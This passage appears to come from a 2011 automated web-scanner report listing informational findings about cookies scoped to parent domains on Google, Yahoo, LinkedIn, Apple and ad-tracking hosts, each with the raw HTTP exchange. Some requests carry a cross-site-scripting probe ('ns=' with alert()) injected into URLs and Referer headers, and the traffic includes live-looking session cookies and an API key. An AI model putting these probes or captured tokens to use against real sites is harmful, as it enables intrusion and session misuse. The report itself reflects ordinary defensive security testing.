BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com
Date: Thu, 03 Feb 2011 20:52:27 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');

12.68. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d87f8fbaa3c80bca:TM=1296765175:LM=1296765175:S=3Tp1xR4u0iL6wLlf; expires=Sat, 02-Feb-2013 20:32:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

12.69. http://maps.google.com/maps/stk/lc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/stk/lc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296787023%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A0%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296787023670%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296787013038%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A1487308896.1296787013%2Cga_sid%3A1296787013%2Cga_hid%3A720933573%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A0%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A0%2Cu_nmime%3A0%2Cbiw%3A1172%2Cbih%3A684%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.google.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:36:09 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=69b3a9f8936fd3cd:TM=1296786969:LM=1296786969:S=Znhp57geg0ZK3Dar; expires=Sun, 03-Feb-2013 02:36:09 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: maps-stickers
X-XSS-Protection: 1; mode=block
Content-Length: 11992

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:hand;}body,table,div,ul,li{font-size
...[SNIP]...

12.70. http://maps.google.com/maps/vp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/vp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/vp?spn=0.009576,0.017166&z=15&key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw&sensor=false&mapclient=jsapi&vp=41.946689,-87.722974 HTTP/1.1
Accept: */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.google.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:36:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=268113a99f223409:TM=1296786968:LM=1296786968:S=oY4yQ6jBh-I_jke5; expires=Sun, 03-Feb-2013 02:36:08 GMT; path=/; domain=.google.com
Set-Cookie: NID=43=AckVHOw3YOdzE60VWTK2kRGV4E-sJackoDnchSo5Wwu9u-LpkYmB9Ler_dwEIKIX6M8UXy6AtUFrDu9sCjo_ITjFSsr_-yIrnoY9_j6-EaMrZeCRQlPPPFyLcZIEGTXS; expires=Sat, 06-Aug-2011 02:36:08 GMT; path=/; domain=.google.com; HttpOnly
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 917

GAddCopyright("m","12408144506920699521",41.9419,-87.7316,41.9515,-87.7144,15,"Google",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:41951320,w:-87758789,n:41967659,e:-87692871
...[SNIP]...

12.71. http://news.google.com/nwshp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /nwshp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=uLb5N4IWzq69fpvU9NRMdRwqyZ6X0vlV4_5pv5CdNKeZzHIttIFsFFROwKvZ8yBA8mb0TbBcsP-oWgtp_QlmRTuRgp76nFXFc891WpJptaOSbHtr3dRtyEUGLvYLghHC;Domain=.google.com;Path=/;Expires=Fri, 05-Aug-2011 20:33:46 GMT;HttpOnly
Date: Thu, 03 Feb 2011 20:33:46 GMT
Expires: Thu, 03 Feb 2011 20:33:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

12.72. https://picasaweb.google.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Thu, 03 Feb 2011 20:32:46 GMT
Date: Thu, 03 Feb 2011 20:32:46 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=8lGxr5UNZETv; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=dmUZ1zrx2VrQBSw1Hytv9A; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=https%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttps%253A%252F%252Fpicasaweb.google.com%252Fhome&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

12.73. https://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view?hl\x3den\x26tab\x3dwq\x22 HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Thu, 03 Feb 2011 20:32:50 GMT
Date: Thu, 03 Feb 2011 20:32:50 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=mCwhgibP1AJo; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=YPoXsbXHf620OMz2tliwug; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

12.74. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EDIAJKANq0itiBCpnizJGquYH6TbIAHAAQH7BYGWAJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ
If-None-Match: "J18332:E0-293462370-1296766279068"

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EBUAJKANq0itiBCpnizJGquYH6TbIAHAAQH8BYG2AJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ; expires=Thu, 05-May-2011 02:23:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
ETag: "J18338:E0-293462370-1296766279068"
Cache-Control: private, no-transform, max-age=600
Expires: Fri, 04 Feb 2011 02:33:00 GMT
Content-Length: 159
Date: Fri, 04 Feb 2011 02:23:00 GMT
Server: QS

qc_results({"segments":[{"id":"D"},{"id":"T"},{"id":"2872"},{"id":"2871"},{"id":"1794"},{"id":"1104"},{"id":"1102"},{"id":"769"},{"id":"768"},{"id":"759"}]});

12.75. http://qa.linkedin.com/pub/smart-devil/19/697/322/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qa.linkedin.com
Path:   /pub/smart-devil/19/697/322/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/smart-devil/19/697/322/x22 HTTP/1.1
Host: qa.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/
Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT
If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:33:42 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

12.76. http://scholar.google.com/schhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=b21d411537c17de4; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=b21d411537c17de4:TM=1296765145:LM=1296765145:S=lnZ4BvSGU2dAv7Fs; expires=Sat, 02-Feb-2013 20:32:25 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:32:25 GMT
Server: scholar
Expires: Thu, 03 Feb 2011 20:32:25 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...

12.77. http://scholar.google.com/scholar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://scholar.google.com/schhp?hl=en&as_sdt=0,9
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=9dd644ba4e502c12; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=9dd644ba4e502c12:TM=1296765148:LM=1296765148:S=HhpqPeTQ6Mm1STTz; expires=Sat, 02-Feb-2013 20:32:28 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:32:28 GMT
Server: scholar
Content-Length: 249
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://scholar.google.com/schhp?
...[SNIP]...

12.78. http://shopping.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: shopping.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:33:43 GMT
Set-Cookie: B=fcqcce56km497&b=3&s=rv; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 27398

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/reset
...[SNIP]...

12.79. http://solutions.liveperson.com/ref/lppb.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 03 Feb 2011 17:52:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=DJKOGOICKIGDBAFDJAHHMONP; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

12.80. https://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 302 Apple
Date: Thu, 03 Feb 2011 17:49:28 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
set-cookie: wosid=csKICi1o0fYy23BuHZ269hYUg3j; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: woinst=920044001; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: asbid=sYTT2CTKKJKACXA24; expires=Sun, 03-Feb-2041 09:49:28 GMT; path=/; domain=.apple.com;
set-cookie: asrec=InNybV91cmkiID0gImh0dHA6Ly9zdG9yZS5hcHBsZS5jb20vMS04MDAtTVktQVBQTEUvV2ViT2JqZWN0cy9BcHBsZVN0b3JlIjsKInNybV9zZXNuX2lkIiA9ICJjc0tJQ2kxbzBmWXkyM0J1SFoyNjloWVVnM2oiOwoic3JtX2luc3RfbmJyIiA9ICI5MjAwNDQwMDEiOwoic3JtX3N2ayIgPSB7Cn07CiJzcm1fYXBwX25tIiA9ICJBcHBsZVN0b3JlIjsKInNybV9leHBpcmVzIiA9ICIyMDExLzAyLzAzLTEwOjA0OjI4IjsK; path=/; domain=.apple.com;
last-modified: Thu, 03 Feb 2011 09:49:29 GMT
cache-control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
location: http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.
expires: Tue, 02 Feb 2010 09:49:29 GMT
pragma: no-cache
vary: *
connection: close
content-length: 266
Content-Type: text/html; charset=ISO-8859-1
x-frame-options: sameorigin

Redirecting to &lt;a HREF=&quot;http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.&quot;&gt;http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap
...[SNIP]...

12.81. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://superpages.122.2o7.net
Path:   /b/ss/superpagesadvert/1/H.14/s01692645419389

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/superpagesadvert/1/H.14/s01692645419389 HTTP/1.1
Host: superpages.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
